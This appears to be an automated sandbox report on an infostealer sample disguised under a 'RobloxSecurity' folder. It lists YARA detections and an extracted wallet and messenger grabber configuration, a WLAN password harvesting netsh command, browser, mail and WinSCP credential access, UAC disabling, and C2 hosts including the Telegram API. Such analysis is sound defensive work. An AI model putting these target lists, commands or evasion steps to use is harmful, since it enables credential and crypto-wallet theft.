                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Disables UAC (registry)
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                  Uses netsh to modify the Windows network and firewall settings
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: Amcache.hve.41.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Gurcu Stealer
                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Yara detected WhiteSnake Stealer
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: powershell.exe, 00000001.00000002.1715254235.00000000062C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal WLAN passwords
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Gurcu Stealer
                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Yara detected WhiteSnake Stealer
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		31
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		Logon Script (Windows)1
                  Scheduled Task/Job                  		1
                  Timestomp                  		Security Account Manager241
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		21
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Clipboard Data                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets161
                  Virtualization/Sandbox Evasion                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input Capture3
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1390172 Sample: jqOHOuPMJP.exe Startdate: 10/02/2024 Architecture: WINDOWS Score: 100 95 api.telegram.org 2->95 97 serveo.net 2->97 99 ip-api.com 2->99 113 Multi AV Scanner detection for domain / URL 2->113 115 Found malware configuration 2->115 117 Antivirus detection for URL or domain 2->117 121 11 other signatures 2->121 11 jqOHOuPMJP.exe 16 5 2->11         started        16 vkefq4cv.oil.exe 2->16         started        18 vkefq4cv.oil.exe 2->18         started        20 3 other processes 2->20 signatures3 119 Uses the Telegram API (likely for C&C communication) 95->119 process4 dnsIp5 109 82.147.85.194, 49729, 80 SIBTEL-ASRU Russian Federation 11->109 93 C:\Users\user\AppData\...\vkefq4cv.oil.exe, PE32 11->93 dropped 143 Adds a directory exclusion to Windows Defender 11->143 145 Disables UAC (registry) 11->145 22 vkefq4cv.oil.exe 6 11->22         started        26 powershell.exe 22 11->26         started        147 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->147 149 Tries to steal Mail credentials (via file / registry access) 16->149 151 Tries to harvest and steal browser information (history, passwords, etc) 16->151 153 Tries to harvest and steal WLAN passwords 16->153 28 cmd.exe 16->28         started        30 cmd.exe 16->30         started        32 ssh.exe 16->32         started        34 WerFault.exe 16->34         started        file6 signatures7 process8 file9 91 C:\Users\user\AppData\...\vkefq4cv.oil.exe, PE32 22->91 dropped 129 Machine Learning detection for dropped file 22->129 131 Found many strings related to Crypto-Wallets (likely being stolen) 22->131 36 cmd.exe 1 22->36         started        39 WmiPrvSE.exe 26->39         started        41 conhost.exe 26->41         started        133 Tries to harvest and steal WLAN passwords 28->133 43 conhost.exe 28->43         started        45 chcp.com 28->45         started        47 netsh.exe 28->47         started        49 findstr.exe 28->49         started        53 4 other processes 30->53 51 conhost.exe 32->51         started        signatures10 process11 signatures12 123 Uses schtasks.exe or at.exe to add and modify task schedules 36->123 125 Uses netsh to modify the Windows network and firewall settings 36->125 127 Tries to harvest and steal WLAN passwords 36->127 55 vkefq4cv.oil.exe 14 5 36->55         started        59 conhost.exe 36->59         started        